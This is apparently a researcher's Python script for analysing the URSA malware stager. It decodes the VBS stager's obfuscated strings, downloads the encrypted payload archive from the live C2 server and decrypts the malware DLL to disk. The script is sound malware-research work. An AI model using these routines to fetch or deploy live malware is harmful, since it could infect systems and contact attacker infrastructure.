Created
November 12, 2023 14:19
The script fetches and decrypts the final URSA DLL based on the VBS stager script that is served after the geofence check. It prints the download URL of the archive that contains the encrypted URSA DLL.
import os
import zipfile
from io import BytesIO

import requests
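# Assumptions about the stager layout:
# 1. The first `const` line carries the number used for string decryption.
# 2. The first few lines after that const call the string-decryption function.
# 3. The payload retrieved from the C2 is a zip archive.

# Path of the VBS stager script to analyse; set this before running.
FILE_PATH = ''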
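def resolve(obf_string, i):
    """Decode one obfuscated string argument taken from the stager.

    The first character carries a per-string offset (its letter index, 'A' = 0).
    Every following pair of letters encodes one output character as
    ``high * 25 + low``, from which the offset and the stager-wide seed ``i``
    are subtracted.

    Args:
        obf_string: the quoted argument exactly as it appears in the stager.
        i: the integer taken from the stager's ``const`` line (the seed).

    Returns:
        The decoded string, or ``''`` when the input is malformed: empty input,
        a payload with an odd number of letters, or a pair whose value does not
        map to a valid code point after the subtraction.
    """
    try:
        offset = ord(obf_string[0]) - 65
        payload = obf_string[1:]
        chars = []
        # Walk the payload two letters at a time; each pair is one character.
        for pos in range(0, len(payload), 2):
            high = ord(payload[pos]) - 65
            low = ord(payload[pos + 1]) - 65
            chars.append(chr(high * 25 + low - offset - i))
    except (IndexError, TypeError, ValueError):
        # Keep the best-effort contract (empty string) for malformed input so a
        # single bad argument does not abort the whole extraction run; anything
        # else is a real bug and is allowed to propagate.
        return ''
    return ''.join(chars)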
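def decrypt_dll(file_handle, file_name):
    """Decrypt the archived payload and write it to ``<file_name>.dll``.

    Byte 0 of ``file_handle`` is the key. Each later byte is recovered by
    subtracting the key and a rolling counter (0..9, restarting after 9),
    modulo 256.

    Args:
        file_handle: raw bytes of the archive member (key byte first).
        file_name: output path stem; ``.dll`` is appended. Pass a sanitized
            value — a name taken straight from an archive is attacker-controlled
            and may carry directory components.

    Raises:
        ValueError: if ``file_handle`` is empty (no key byte to work with).
    """
    if not file_handle:
        raise ValueError('empty payload: nothing to decrypt')
    key = file_handle[0]
    # The counter restarts at 0 every ten bytes after the key byte.
    plain = bytes(
        (byte - key - idx % 10) & 0xFF
        for idx, byte in enumerate(file_handle[1:])
    )
    with open(f'{file_name}.dll', 'wb') as out:
        out.write(plain)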
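def _decrypt_stager_strings(lines_data):
    """Return every string the stager hands to its decryption function, decoded.

    Walks the stager until the first ``const`` line (its last token is the
    seed), takes the callee name from the line that follows, then decodes the
    quoted argument of every later line mentioning that callee, stopping at the
    next ``const`` line. Order matches the order in the stager.
    """
    decrypted = []
    for line_no, line in enumerate(lines_data):
        if not line.startswith('const'):
            continue
        seeder = int(line.split(' ')[-1])  # the seed used for string decryption
        # The line right after the const is the first call of the decryption
        # function; its callee name tells us which later lines to harvest.
        function_string = lines_data[line_no + 1].split('(')[0].split(' ')[-1]
        for inner in lines_data[line_no + 1:]:
            if function_string in inner:
                # The quoted argument is the second-to-last '"'-delimited piece.
                decrypted.append(resolve(inner.split('"')[-2], seeder))
            if inner.startswith('const'):
                break
        break
    return decrypted


def main():
    """Extract the payload URL from the stager, download the archive, decrypt the DLL."""
    if not FILE_PATH:
        raise SystemExit('[-] Set FILE_PATH to the path of the VBS stager script')
    with open(FILE_PATH, 'r') as stager:
        lines_data = stager.readlines()
    decrypted_strings = _decrypt_stager_strings(lines_data)
    # The URL is assembled from decoded strings 1 and 5 with a literal "m1"
    # between them; fail with a clear message rather than an IndexError.
    if len(decrypted_strings) < 6:
        raise SystemExit(
            f'[-] Expected at least 6 decrypted strings, got {len(decrypted_strings)}'
        )
    payload_url = f'{decrypted_strings[1]}m1{decrypted_strings[5]}'
    print(f'[+] Fetching payload from C2:{payload_url}')
    # This request goes to live attacker infrastructure; the timeout keeps an
    # unresponsive C2 from hanging the script indefinitely.
    response = requests.get(payload_url, timeout=30)
    if response.status_code != 200:
        print(f'[-] Error code {response.status_code} while trying to download from:{payload_url}')
        return
    # The retrieved data is a zip archive; its first member is the encrypted DLL.
    with zipfile.ZipFile(BytesIO(response.content)) as archive:
        names = archive.namelist()
        if not names:
            raise SystemExit('[-] The downloaded archive has no members')
        member_name = names[0]
        with archive.open(member_name, 'r') as member:
            file_handle = member.read()
    # Member names are attacker-controlled; drop any directory part (either
    # separator) so the output cannot be steered outside the working directory.
    file_name = os.path.basename(member_name.replace('\\', '/'))
    decrypt_dll(file_handle, file_name)
    print(f'[+] The file {file_name}.dll was created')


if __name__ == '__main__':
    main()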